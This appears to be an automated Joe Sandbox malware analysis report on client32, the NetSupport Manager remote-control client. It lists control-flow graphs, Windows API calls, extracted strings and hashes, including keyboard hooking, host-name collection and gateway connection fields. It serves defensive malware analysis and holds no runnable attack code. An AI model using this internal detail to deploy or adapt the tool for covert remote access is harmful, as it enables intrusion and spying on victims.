                                                                                                                                                                                                    • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$141700$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
                                                                                                                                                                                                    • API String ID: 1866202007-3016537214
                                                                                                                                                                                                    • Opcode ID: cbcefc7ec60a5b39576baa76d759e841cb725e3a3be421aaceec234747df412c
                                                                                                                                                                                                    • Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbcefc7ec60a5b39576baa76d759e841cb725e3a3be421aaceec234747df412c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1028 1102d5b0-1102d600 call 1110c420 1031 1102d602-1102d616 call 1113f0c0 1028->1031 1032 1102d618 1028->1032 1034 1102d61e-1102d663 call 1113e8f0 call 1113f130 1031->1034 1032->1034 1040 1102d803-1102d812 call 11141430 1034->1040 1041 1102d669 1034->1041 1049 1102d818-1102d828 1040->1049 1043 1102d670-1102d673 1041->1043 1045 1102d675-1102d677 1043->1045 1046 1102d698-1102d6a1 1043->1046 1050 1102d680-1102d691 1045->1050 1047 1102d6a7-1102d6ae 1046->1047 1048 1102d7d4-1102d7ed call 1113f130 1046->1048 1047->1048 1052 1102d7a3-1102d7b8 call 1115f5b7 1047->1052 1053 1102d6b5-1102d6b7 1047->1053 1054 1102d7ba-1102d7cf call 1115f5b7 1047->1054 1055 1102d74a-1102d77d call 1115e091 call 1113e8f0 1047->1055 1056 1102d78b-1102d7a1 call 11160790 1047->1056 1057 1102d73b-1102d745 1047->1057 1058 1102d77f-1102d789 1047->1058 1059 1102d6fc-1102d702 1047->1059 1060 1102d72c-1102d736 1047->1060 1048->1043 1076 1102d7f3-1102d7f5 1048->1076 1062 1102d82a 1049->1062 1063 1102d82f-1102d843 call 1102c850 1049->1063 1050->1050 1051 1102d693 1050->1051 1051->1048 1052->1048 1053->1048 1065 1102d6bd-1102d6f7 call 1115e091 call 1113e8f0 call 1102c850 1053->1065 1054->1048 1055->1048 1056->1048 1057->1048 1058->1048 1067 1102d704-1102d718 call 1115f5b7 1059->1067 1068 1102d71d-1102d727 1059->1068 1060->1048 1062->1063 1079 1102d848-1102d84d 1063->1079 1065->1048 1067->1048 1068->1048 1082 1102d8f3-1102d90d call 111429e0 1076->1082 1083 1102d7fb-1102d801 1076->1083 1079->1082 1085 1102d853-1102d878 call 110b6bd0 call 11142a60 1079->1085 1095 1102d963-1102d96f call 1102b120 1082->1095 1096 1102d90f-1102d928 call 1105d340 1082->1096 1083->1040 1083->1049 1103 1102d883-1102d889 1085->1103 1104 1102d87a-1102d881 1085->1104 1108 1102d971-1102d978 1095->1108 1109 1102d948-1102d94f 1095->1109 1096->1095 1107 1102d92a-1102d93c 1096->1107 1110 1102d88b-1102d892 call 110279d0 1103->1110 1111 1102d8e9 1103->1111 1104->1082 1107->1095 1127 1102d93e 1107->1127 1112 1102d955-1102d958 1108->1112 1113 1102d97a-1102d984 1108->1113 1109->1112 1115 1102db5a-1102db7b GetComputerNameA 1109->1115 1110->1111 1126 1102d894-1102d8c6 1110->1126 1111->1082 1117 1102d95a-1102d961 call 110b6bd0 1112->1117 1118 1102d989 1112->1118 1113->1115 1120 1102dbb3-1102dbb9 1115->1120 1121 1102db7d-1102dbb1 call 110278a0 1115->1121 1125 1102d98c-1102da66 call 11027550 call 11027850 call 11027550 * 2 LoadLibraryA GetProcAddress 1117->1125 1118->1125 1123 1102dbbb-1102dbc0 1120->1123 1124 1102dbef-1102dc02 call 11160790 1120->1124 1121->1120 1147 1102dc07-1102dc13 1121->1147 1128 1102dbc6-1102dbca 1123->1128 1143 1102ddf7-1102de1a call 11087b10 1124->1143 1175 1102db2a-1102db32 SetLastError 1125->1175 1176 1102da6c-1102da83 1125->1176 1145 1102d8d0-1102d8df call 110f3da0 1126->1145 1146 1102d8c8-1102d8ce 1126->1146 1127->1109 1133 1102dbe6-1102dbe8 1128->1133 1134 1102dbcc-1102dbce 1128->1134 1142 1102dbeb-1102dbed 1133->1142 1140 1102dbe2-1102dbe4 1134->1140 1141 1102dbd0-1102dbd6 1134->1141 1140->1142 1141->1133 1148 1102dbd8-1102dbe0 1141->1148 1142->1124 1142->1147 1159 1102de42-1102de4a 1143->1159 1160 1102de1c-1102de22 1143->1160 1150 1102d8e2-1102d8e4 call 1102cde0 1145->1150 1146->1145 1146->1150 1155 1102dc15-1102dc2a call 110b6bd0 call 11029870 1147->1155 1156 1102dc2c-1102dc3f call 11080b10 1147->1156 1148->1128 1148->1140 1150->1111 1183 1102dc83-1102dc9c call 11080b10 1155->1183 1172 1102dc41-1102dc64 1156->1172 1173 1102dc66-1102dc68 1156->1173 1165 1102de5c-1102dee8 call 1115e091 * 2 call 11142a60 * 2 GetCurrentProcessId call 110ebb00 call 11027900 call 11142a60 call 1115e4d1 1159->1165 1166 1102de4c-1102de59 call 1113f120 call 1115e091 1159->1166 1160->1159 1164 1102de24-1102de3d call 1102cde0 1160->1164 1164->1159 1166->1165 1172->1183 1181 1102dc70-1102dc81 1173->1181 1185 1102daf3-1102daff 1175->1185 1176->1185 1196 1102da85-1102da8e 1176->1196 1181->1181 1181->1183 1204 1102dca2-1102dd1d call 11142a60 call 110cd950 call 110cf1b0 call 110b6bd0 wsprintfA call 110b6bd0 wsprintfA 1183->1204 1205 1102dddc-1102dde9 call 11160790 1183->1205 1189 1102db42-1102db51 1185->1189 1190 1102db01-1102db0d 1185->1190 1189->1115 1198 1102db53-1102db54 FreeLibrary 1189->1198 1194 1102db1f-1102db23 1190->1194 1195 1102db0f-1102db1d GetProcAddress 1190->1195 1201 1102db34-1102db36 SetLastError 1194->1201 1202 1102db25-1102db28 1194->1202 1195->1194 1196->1185 1200 1102da90-1102dac6 call 11142a60 call 11128350 1196->1200 1198->1115 1200->1185 1224 1102dac8-1102daee call 11142a60 call 11027590 1200->1224 1208 1102db3c 1201->1208 1202->1208 1240 1102dd33-1102dd49 call 11125f90 1204->1240 1241 1102dd1f-1102dd2e call 110290f0 1204->1241 1217 1102ddec-1102ddf1 CharUpperA 1205->1217 1208->1189 1217->1143 1224->1185 1245 1102dd62-1102dd9c call 110ce900 * 2 1240->1245 1246 1102dd4b-1102dd5d call 110ce900 1240->1246 1241->1240 1253 1102ddb2-1102ddda call 11160790 call 110ce4f0 1245->1253 1254 1102dd9e-1102ddad call 110290f0 1245->1254 1246->1245 1253->1217 1254->1253
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$141700$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                                    • API String ID: 2111968516-1865671485
                                                                                                                                                                                                    • Opcode ID: 264046cbf54c2cec41e4150a3278f8080541df2986705949a6843abdc29eacfb
                                                                                                                                                                                                    • Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 264046cbf54c2cec41e4150a3278f8080541df2986705949a6843abdc29eacfb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1261 1113fbe0-1113fc21 GetModuleFileNameA 1262 1113fc63 1261->1262 1263 1113fc23-1113fc36 call 11080be0 1261->1263 1265 1113fc69-1113fc6d 1262->1265 1263->1262 1272 1113fc38-1113fc61 LoadLibraryA 1263->1272 1266 1113fc89-1113fca7 GetModuleHandleA GetProcAddress 1265->1266 1267 1113fc6f-1113fc7c LoadLibraryA 1265->1267 1270 1113fcb7-1113fce0 GetProcAddress * 4 1266->1270 1271 1113fca9-1113fcb5 1266->1271 1267->1266 1269 1113fc7e-1113fc86 LoadLibraryA 1267->1269 1269->1266 1273 1113fce3-1113fd5b GetProcAddress * 10 call 1115e4d1 1270->1273 1271->1273 1272->1265 1275 1113fd60-1113fd63 1273->1275
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,75C223A0), ref: 1113FC13
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 1113FC5C
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$Module$FileHandleName
                                                                                                                                                                                                    • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                                                                                                    • API String ID: 1621119295-2061581830
                                                                                                                                                                                                    • Opcode ID: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                                                                                                    • Instruction ID: 7823fe44ffa72cf0609a50e83b8fe1e4d3ef80fae5d5290087d1941409006158
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A413F70A00B05AFD7209F7A8CC8E6AFBF8FF59715B04496EE485D3690E774E8408B59

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1361 689c3d00-689c3d42 call 689d1c50 call 689c3b80 1365 689c3d47-689c3d4f 1361->1365 1366 689c3d6c-689c3d6e 1365->1366 1367 689c3d51-689c3d6b call 689d28e1 1365->1367 1369 689c3d87-689c3da1 call 689b8fb0 1366->1369 1370 689c3d70-689c3d84 call 689b6f50 1366->1370 1376 689c3dc5-689c3e44 call 689b5e90 * 2 call 689c7be0 call 689b5e20 lstrlenA 1369->1376 1377 689c3da3-689c3dc4 call 689b63c0 call 689d28e1 1369->1377 1370->1369 1390 689c3e98-689c3fbe call 689b5500 call 689b6050 call 689c7c70 * 2 call 689c7d00 * 3 call 689b5060 call 689c7d00 call 689d1bfd call 689c7d00 gethostname call 689c7d00 call 689bb8e0 1376->1390 1391 689c3e46-689c3e95 call 689cd8b0 call 689b5060 call 689b4830 call 689d1bfd 1376->1391 1426 689c3fc5-689c3fe1 call 689c7d00 1390->1426 1427 689c3fc0 1390->1427 1391->1390 1430 689c3ff8-689c3ffe 1426->1430 1431 689c3fe3-689c3ff5 call 689c7d00 1426->1431 1427->1426 1433 689c421a-689c4263 call 689c7b60 call 689d1bfd call 689b98d0 call 689c77e0 1430->1433 1434 689c4004-689c4022 call 689b5e20 1430->1434 1431->1430 1461 689c4265-689c4291 call 689ba4e0 call 689d28e1 1433->1461 1462 689c4292-689c42aa call 689d28e1 1433->1462 1440 689c405a-689c4084 call 689b5e20 1434->1440 1441 689c4024-689c4057 call 689b5060 call 689c7d00 call 689d1bfd 1434->1441 1449 689c408a-689c41ce call 689b5060 call 689c7d00 call 689d1bfd call 689b5e20 call 689b5060 call 689c7d00 call 689d1bfd call 689b5e20 call 689b5060 call 689c7d00 call 689d1bfd call 689b5e20 call 689b5060 call 689c7d00 call 689d1bfd 1440->1449 1450 689c41d1-689c4217 call 689c7d00 call 689b5e20 call 689c7d00 1440->1450 1441->1440 1449->1450 1450->1433
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: *Dept$*Gsk$1.1$141700$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                                                                                    • API String ID: 0-1022012017
                                                                                                                                                                                                    • Opcode ID: 1bc4d73592b90fbf59213ebdf95592c9cd0666e543ec125b3d86f69403d0395c
                                                                                                                                                                                                    • Instruction ID: 3211e3f5981a2a6b0149b402e955c333ef415a33701a6899f5eec2db37e5e906
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bc4d73592b90fbf59213ebdf95592c9cd0666e543ec125b3d86f69403d0395c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE1A2B6C405187ACB25DBA4DC80FFFB7789F69209F8040D9E50962141EB75EB85CFA2

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1502 1113dad0-1113db15 call 11142a60 1505 1113dba7-1113dbd3 call 1113f4f0 call 111434f0 LoadLibraryA 1502->1505 1506 1113db1b-1113db3d call 1105d340 1502->1506 1518 1113dc07 1505->1518 1519 1113dbd5-1113dbdc 1505->1519 1511 1113db8b-1113db92 1506->1511 1512 1113db3f-1113db5c call 11015e10 1506->1512 1511->1505 1516 1113db94-1113dba0 call 11017670 1511->1516 1521 1113db5e-1113db6b GetProcAddress 1512->1521 1522 1113db6d-1113db6f 1512->1522 1516->1505 1530 1113dba2 call 110cb920 1516->1530 1524 1113dc11-1113dc31 GetClassInfoExA 1518->1524 1519->1518 1523 1113dbde-1113dbe5 1519->1523 1521->1522 1526 1113db71-1113db73 SetLastError 1521->1526 1533 1113db79-1113db82 1522->1533 1523->1518 1527 1113dbe7-1113dc05 call 1105d340 1523->1527 1528 1113dc37-1113dc5f call 1115e4f0 call 11140b20 1524->1528 1529 1113dcd9-1113dd34 1524->1529 1526->1533 1527->1524 1543 1113dc61-1113dc75 call 110290f0 1528->1543 1544 1113dc78-1113dcc0 call 11140b20 call 11140b50 GetStockObject RegisterClassExA 1528->1544 1545 1113dd36-1113dd3d 1529->1545 1546 1113dd6e-1113dd75 1529->1546 1530->1505 1533->1511 1537 1113db84-1113db85 FreeLibrary 1533->1537 1537->1511 1543->1544 1544->1529 1575 1113dcc2-1113dcd6 call 110290f0 1544->1575 1545->1546 1548 1113dd3f-1113dd46 1545->1548 1550 1113ddb1-1113ddd5 call 1105d340 1546->1550 1551 1113dd77-1113dd86 call 1110c420 1546->1551 1548->1546 1554 1113dd48-1113dd5f call 11129900 LoadLibraryA 1548->1554 1561 1113dde3-1113dde8 1550->1561 1562 1113ddd7-1113dde1 1550->1562 1565 1113ddaa 1551->1565 1566 1113dd88-1113dda8 1551->1566 1554->1546 1570 1113dd61-1113dd69 GetProcAddress 1554->1570 1568 1113ddf4-1113ddfb 1561->1568 1569 1113ddea 1561->1569 1562->1568 1567 1113ddac 1565->1567 1566->1567 1567->1550 1571 1113de08-1113de25 call 11139490 1568->1571 1572 1113ddfd-1113de03 call 110f58a0 1568->1572 1569->1568 1570->1546 1581 1113de2b-1113de32 1571->1581 1582 1113deda-1113deea 1571->1582 1572->1571 1575->1529 1583 1113de34-1113de46 call 1110c420 1581->1583 1584 1113de6f-1113de76 1581->1584 1593 1113de61 1583->1593 1594 1113de48-1113de5f call 11159ed0 1583->1594 1586 1113de78-1113de7f 1584->1586 1587 1113de9f-1113deb0 1584->1587 1589 1113de81 call 11131d10 1586->1589 1590 1113de86-1113de9a SetTimer 1586->1590 1591 1113deb2-1113deb9 1587->1591 1592 1113dec9-1113ded4 #17 LoadLibraryA 1587->1592 1589->1590 1590->1587 1591->1592 1596 1113debb-1113dec2 1591->1596 1592->1582 1599 1113de63-1113de6a 1593->1599 1594->1599 1596->1592 1597 1113dec4 call 1112a760 1596->1597 1597->1592 1599->1584
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1113DB73
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1113DB85
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
                                                                                                                                                                                                    • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
                                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 1113DC9A
                                                                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 1113DCB5
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
                                                                                                                                                                                                    • #17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4
                                                                                                                                                                                                      • Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
